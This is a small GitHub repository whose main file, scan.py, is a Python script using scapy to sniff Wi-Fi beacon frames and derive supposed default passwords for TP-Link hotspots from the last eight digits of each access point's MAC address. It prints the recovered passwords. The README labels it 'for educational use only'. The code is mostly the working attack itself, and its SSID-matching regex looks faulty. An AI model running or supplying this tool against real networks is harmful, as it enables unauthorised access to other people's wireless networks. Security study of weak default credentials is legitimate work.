├── .github
    └── dependabot.yml
├── .gitignore
├── LICENSE
├── README.md
├── docs
    └── twitter.largecardinal.682591420969029632.png
├── requirements.txt
└── scan.py


/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | version: 2
2 | updates:
3 | - package-ecosystem: pip
4 |   directory: "/"
5 |   schedule:
6 |     interval: daily
7 |     time: "10:00"
8 |   open-pull-requests-limit: 10
9 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | *.egg-info/
 24 | .installed.cfg
 25 | *.egg
 26 | MANIFEST
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | .pytest_cache/
 49 | 
 50 | # Translations
 51 | *.mo
 52 | *.pot
 53 | 
 54 | # Django stuff:
 55 | *.log
 56 | local_settings.py
 57 | db.sqlite3
 58 | 
 59 | # Flask stuff:
 60 | instance/
 61 | .webassets-cache
 62 | 
 63 | # Scrapy stuff:
 64 | .scrapy
 65 | 
 66 | # Sphinx documentation
 67 | docs/_build/
 68 | 
 69 | # PyBuilder
 70 | target/
 71 | 
 72 | # Jupyter Notebook
 73 | .ipynb_checkpoints
 74 | 
 75 | # pyenv
 76 | .python-version
 77 | 
 78 | # celery beat schedule file
 79 | celerybeat-schedule
 80 | 
 81 | # SageMath parsed files
 82 | *.sage.py
 83 | 
 84 | # Environments
 85 | .env
 86 | .venv
 87 | env/
 88 | venv/
 89 | ENV/
 90 | env.bak/
 91 | venv.bak/
 92 | 
 93 | # Spyder project settings
 94 | .spyderproject
 95 | .spyproject
 96 | 
 97 | # Rope project settings
 98 | .ropeproject
 99 | 
100 | # mkdocs documentation
101 | /site
102 | 
103 | # mypy
104 | .mypy_cache/
105 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 Aidan Holland
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # TP-Link-defaults
 2 | 
 3 | Python script for trying default passwords for some TP-Link Hotspots
 4 | 
 5 | Inspired by [![twitter](docs/twitter.largecardinal.682591420969029632.png)](https://twitter.com/LargeCardinal/status/682591420969029632)
 6 | 
 7 | ## Usage
 8 | 
 9 |     usage: scan.py [-h] [-p] [-t TIMEOUT]
10 | 
11 |     Python script for trying default passwords for some TP-Link Hotspots
12 | 
13 |     optional arguments:
14 |     -h, --help            show this help message and exit
15 |     -p, --print-all       print all found ssid's
16 |     -t TIMEOUT, --timeout TIMEOUT
17 | 
18 |     FOR EDUCATIONAL USE ONLY
19 | 
20 | ## Config
21 | 
22 | -   `timeout` stop sniffing after a given time
23 | -   `print_all` print all found ssid's
24 | 
25 | ## License
26 | 
27 | [MIT License](LICENSE)
28 | 


--------------------------------------------------------------------------------
/docs/twitter.largecardinal.682591420969029632.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehappydinoa/TP-Link-defaults/73aa122f8e64baf21c1063b568e310d471a8bebf/docs/twitter.largecardinal.682591420969029632.png


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | scapy>=2.4.0
2 | 


--------------------------------------------------------------------------------
/scan.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | from argparse import ArgumentParser
 3 | from collections import namedtuple
 4 | from re import search
 5 | 
 6 | from scapy.layers.dot11 import Dot11, Dot11Elt
 7 | from scapy.sendrecv import sniff
 8 | 
 9 | parser = ArgumentParser(description="Python script for trying default passwords for some TP-Link Hotspots",
10 |                         epilog="FOR EDUCATIONAL USE ONLY")
11 | parser.add_argument("-p", "--print-all",
12 |                     help="print all found ssid's", action="store_true")
13 | parser.add_argument("-t", "--timeout", type=int)
14 | args = parser.parse_args()
15 | 
16 | Config = namedtuple("Config", ["timeout", "print_all"])
17 | CONFIG = Config(timeout=args.timeout, print_all=args.print_all)
18 | 
19 | endpoints = {
20 |     # mac_address: [ssid, password]
21 | }
22 | 
23 | 
24 | def generate_password_list():
25 |     return [endpoints[endpoint][1] for endpoint in endpoints.keys() if endpoints[endpoint][1]]
26 | 
27 | 
28 | def is_tp_link(ssid):
29 |     return search("^tp*link$", ssid.lower())
30 | 
31 | 
32 | def get_password(mac_address):
33 |     return mac_address.replace(":", "")[-8:]
34 | 
35 | 
36 | def add_endpoint(ssid, mac_address, password=None):
37 |     endpoints[mac_address] = [ssid, password]
38 | 
39 | 
40 | def print_endpoint(ssid, mac_address, channel, password=None):
41 |     print("\nSSID: {ssid} \nMac Address: {mac_address} \nChannel: {channel}".format(
42 |         ssid=ssid, mac_address=mac_address, channel=channel))
43 |     if password:
44 |         print("Default Password: {password}".format(password=password))
45 | 
46 | 
47 | def packet_handler(packet):
48 |     if packet.haslayer(Dot11) and packet.type == 0 and packet.subtype == 8:
49 |         try:
50 |             ssid = packet.info.decode("utf-8")
51 |             mac_address = str(packet.addr2)
52 |             channel = int(ord(packet[Dot11Elt:3].info))
53 |             if not endpoints.get(mac_address) and not ssid == "":
54 |                 if CONFIG.print_all:
55 |                     print_endpoint(ssid, mac_address, channel)
56 |                 if is_tp_link(ssid):
57 |                     password = get_password(mac_address)
58 |                     print_endpoint(ssid, mac_address,
59 |                                    channel, password=password)
60 |                     add_endpoint(ssid, mac_address, password=password)
61 |                 else:
62 |                     add_endpoint(ssid, mac_address)
63 |         except (UnicodeDecodeError, AttributeError, TypeError, IndexError, AttributeError):
64 |             pass
65 | 
66 | 
67 | def main():
68 |     try:
69 |         if CONFIG.timeout:
70 |             print("Scanning for {timeout} sec...".format(
71 |                 timeout=CONFIG.timeout))
72 |         else:
73 |             print("Scanning...")
74 |         sniff(prn=packet_handler, store=False,
75 |               monitor=True, timeout=CONFIG.timeout)
76 |         print("Finishing up...\n")
77 |         print("Found {len_endpoints} endpoints".format(
78 |             len_endpoints=len(endpoints)))
79 |         print("Found {count_passwords} passwords".format(
80 |             count_passwords=len(generate_password_list())))
81 |         # print(repr(endpoints))
82 |     except KeyboardInterrupt:
83 |         print("Exiting...")
84 |         exit(0)
85 | 
86 | 
87 | if __name__ == "__main__":
88 |     main()
89 | 


--------------------------------------------------------------------------------